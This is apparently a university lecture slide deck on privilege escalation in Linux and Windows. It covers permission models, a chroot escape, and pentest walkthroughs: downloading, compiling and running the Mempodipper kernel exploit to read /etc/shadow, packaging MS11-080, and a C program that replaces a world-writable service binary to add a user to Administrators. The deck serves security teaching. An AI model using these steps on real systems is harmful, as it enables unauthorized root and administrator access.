See discussions, stats, and author profiles for this publication at: https://www.researchgate.

net/publication/342866013

About Privilege Escalation in Linux (and Windows)

Presentation · July 2020

DOI: 10.13140/RG.2.2.29176.26887

CITATIONS READS

0 748

1 author:

Mohamed Nassar
American University of Beirut
78 PUBLICATIONS   400 CITATIONS   

SEE PROFILE

Some of the authors of this publication are also working on these related projects:

Final Year Project Spring 2019 (shoplifting smart stores) View project

voip security View project

All content following this page was uploaded by Mohamed Nassar on 11 July 2020.

The user has requested enhancement of the downloaded file.

About Privilege Escalation in Linux (and
Windows)
Mohamed Nassar

American University of Beirut

July 11, 2020

Introduction Linux Windows Configuration Issues Conclusion References

Introduction

Definition
Privilege escalation is the process of increasing the level of access to a machine, or network.

In most operating systems, and networked environments, the process of privilege escalation is
inherently prevented, in order to adhere to the user privilege separation model.

Breaking the security model

Therefore, by definition, the process of privilege escalation will involve breaking this security
model.

2 / 22
Introduction Linux Windows Configuration Issues Conclusion References

Linux Privilege System

I Subject: Process
I Object: Files, Directories, Network Sockets, Other processes, Memory, File descriptors
I Principal:
I User ID : 32-bit integer
I group ID: 32-bit integer

A process has a single uid and a list of gids.

3 / 22
Introduction Linux Windows Configuration Issues Conclusion References

Actions

Files: Read, Write, Execute, change permissions

Directories: Link, Unlink, rename, create
File descriptors: can be passed around with the same set of privileges obtaining at the open
file time.
Processes: The user can create, kill or ptrace (debug) a process.
Networking: Connect, listen, read/write data, send/recv raw packets
To listen on a port < 1024, you need to have uid 0 (root).

4 / 22
Introduction Linux Windows Configuration Issues Conclusion References

File permissions
Each file/directory has an owner (uid), gid and a set of bit permissions.
r w x
uid (owner) 1 1 0
gid 1 0 0
other 1 0 0
Table: Permissions for octal 644

You can change the permissions if you are the owner of the file! (chmod)
For Directories:
read means you can list the contents, write means you can link/unlink, execute means you can
lookup a file in the directory.

5 / 22
Introduction Linux Windows Configuration Issues Conclusion References

Example

open("/etc/passwd")

We need:
Execute on / (to lookup etc)
Execute on etc (to lookup the file)
Read on /etc/passwd
Puzzle
I want the file grades.csv to be only accessible for TAs who are also in my group. There is a
group for all TAs and another group for my assistants.

6 / 22
Introduction Linux Windows Configuration Issues Conclusion References

Bootstrapping
root can setuid(uid) for any process
setgid and setgroups can be used to set the groups of a process

I login runs as uid=0

I login checks your user name in /etc/passwd
I login checks your password in /etc/shadow
I login runs a shell (exec /bin/sh) with your uid (found in /etc/passwd)

setuid binaries
setuid binaries such as sudo and su have the suid bit set which gives the uid of the owner during
execution (here uid=0).

Escalation
What if the executed process with suid bit set has some bug / vulnerability?
7 / 22
Introduction Linux Windows Configuration Issues Conclusion References

Defense against escalation

chroot
I restricts your namespace to a subdirectory.
I changes how to evaluate ".." in this directory (and makes it point to the same directory).
I example: chroot /foo (now /x means /foo/x)

How to escape chroot?

I The kernel keeps track of only one chroot directory
I open("/") gives a file descriptor (fd) for /foo
I chroot ("/bar")
I The effective root is currently /foo/bar
I the ../ redirection only applies for /bar
I fchdir(fd)
I chdir ("..") 8 / 22
Introduction Linux Windows Configuration Issues Conclusion References

Privilege escalation in penetration testing

Consider the following scenario:
I You have discovered SSH credentials for a user on an Ubuntu machine.
I You SSH in, and discover that you have normal user privileges.
I You discover that the machine is running Ubuntu 11.10, 32 bit, which has never been
patched.
I You decide to use a known Linux kernel root exploit, which affects CVE 2012-0056.
I You download the exploit to the victim machine, compile it, and run it.
him@ubuntu:~$ id
uid=1000(him) gid=1000(him)
him@ubuntu:~$ cat /etc/shadow|grep root
cat: /etc/shadow: Permission denied
him@ubuntu:~$ wget -O exploit.c http://www.exploit-db.com/download/18411
him@ubuntu:~$ gcc -o mempodipper exploit.c
him@ubuntu:~$ ./mempodipper
9 / 22
Introduction Linux Windows Configuration Issues Conclusion References

Mempodipper
Let’s take a look at the exploit c file header:
/*
Exploit code is here: http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c
Blog post about it is here: http://blog.zx2c4.com/749
EDB-Note: Updated version can be found here: https://www.exploit-db.com/exploits/35161/

# Exploit Title: Mempodipper - Linux Local Root for >=2.6.39, 32-bit and 64-bit
# Date: Jan 21, 2012
# Author: zx2c4
# Tested on: Gentoo, Ubuntu
# Platform: Linux
# Category: Local
# CVE-2012-0056

* Mempodipper
* by zx2c4
* Jan 21, 2012
* CVE-2012-0056
*/ 10 / 22
Introduction Linux Windows Configuration Issues Conclusion References

Mempodipper blog

Let’s look at the blog for more explanations:

... There are no restrictions on opening; anyone can open the /proc/pid/mem fd for any process
Now naturally, we want to write into the memory of suid processes, since then we can get root.
Take a look at this:
$ su "yeeeee haw I am a cowboy"
Unknown id: yeeeee haw I am a cowboy
su will spit out whatever text you want onto stderr, prefixed by "Unknown id:". So, we can open
a fd to /proc/self/mem, lseek to the right place in memory for writing (more on that later), use
dup2 to couple together stderr and the mem fd, and then exec to su $shellcode to write an shell
spawner to the process memory, and then we have root. Really? Not so easy.

11 / 22
Introduction Linux Windows Configuration Issues Conclusion References

Mempodipper Run
him@ubuntu:~$ ./mempodipper
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork. # id
[+] Opening parent mem /proc/8810/mem in child. uid=0(root) gid=0(root)
[+] Sending fd 3 to parent. # cat /etc/shadow |grep root
[+] Received fd at 5. root:!:15806:0:99999:7:::
[+] Assigning fd 5 to stderr. #
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x8049520.
[+] Calculating su padding.
[+] Seeking to offset 0x8049514.
[+] Executing su with shellcode.

12 / 22
Introduction Linux Windows Configuration Issues Conclusion References

Example of Privilege escalation in Windows

A nice local privilege escalation exploit for the Windows environment is the MS11-08052
AfdJoinLeaf Privilege Escalation vulnerability.
http://technet.microsoft.com/en-us/security/bulletin/ms11-080
Poor Validation
This bug is a classic example of an elevation of privilege vulnerability, caused by poor validation
of input passed from user mode to the Windows kernel.
The Ancillary FunctionDriver (afd.sys), allows a local attacker to pass a malicious crafted input
leading to an arbitrary memory overwrite in kernel space.
Affected systems
Unpatched 32 and 64 bit versions of Windows XP and Windows 2003.

13 / 22
Introduction Linux Windows Configuration Issues Conclusion References

The MS11-080 Exploit

Figure: A Python script can be found on exploit-db.com

http://www.exploit-db.com/exploits/18176/
14 / 22
Introduction Linux Windows Configuration Issues Conclusion References

Some logistics ..

Python is not there!

we probably won’t have a Python environment pre-installed on the victim machine.

PyInstaller
Use the PyInstaller module https://www.pyinstaller.org/ to create a standalone
Windows executable from a Python script.
Use a Windows 7 machine and Install PyWin32 and PyInstaller
python pyinstaller.py --onefile ms11-080.py

15 / 22
Introduction Linux Windows Configuration Issues Conclusion References

Copy and Run

Figure: whoami? I am Admin!

16 / 22
Introduction Linux Windows Configuration Issues Conclusion References

Configuration Issues

Real world privilege escalation

In reality, the process of privilege escalation is more often achieved by finding various
misconfigurations on the victim machine, rather than actively exploiting a vulnerable service
with higher privileges.

This is especially true in corporate environments, where patches and updates are installed on a
regular basis, leaving a relatively small known vulnerability attack surface.

17 / 22
Introduction Linux Windows Configuration Issues Conclusion References

Incorrect File and Service Permissions

Imagine the following scenario:
I A software developer creates a program that runs as a Windows service.
I During the installation of the program, the developer does not take care to verify the
access permissions of the file used by their service,
I the file is left in such a state that the Everyone Windows group has full read and write
access to the file.
I This would allow a lower privileged user to replace the affected file used with a malicious
one.

Just replace the file!

The next time the service is restarted, or the machine is rebooted, the malicious file will be
executed with SYSTEM privileges.

18 / 22
Introduction Linux Windows Configuration Issues Conclusion References

Example

Take the ScsiAccess service, installed by Photodex ProShow Producer v5.0.3310.

Let’s check it with the icacls ustility:

c:\Program Files\Photodex\ProShow Producer>icacls scsiaccess.exe

scsiaccess.exe NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
Everyone:(I)(F)

19 / 22
Introduction Linux Windows Configuration Issues Conclusion References

Escalation Plan
I create a Windows executable:
root@kali:~# cat useradd.c
#include <stdlib.h> /* system, NULL, EXIT_FAILURE */
int main ()
{
int i = system ("net localgroup administrators HIM /add");
return 0;
}
I cross-compile for the target machine:
root@kali:~# i686-w64-mingw32-gcc -o scsiaccess.exe useradd.c
I replace the original scsiaccess.exe file with our own
I wait patiently for a service restart, or a system reboot.
The next time the service is started, the fake scsiaccess.exe file will be run with SYSTEM
privileges, thus successfully adding our low privileged user to the Administrators group.
20 / 22
Introduction Linux Windows Configuration Issues Conclusion References

Thank you!

21 / 22
Introduction Linux Windows Configuration Issues Conclusion References

References

MIT 6.858 Computer Systems Security. http://ocw.mit.edu/6-858F14. Fall 2014.

Penetration Testing with Kali Linux. OSCP Training. v1.1.6. 2018.

View publication stats

22 / 22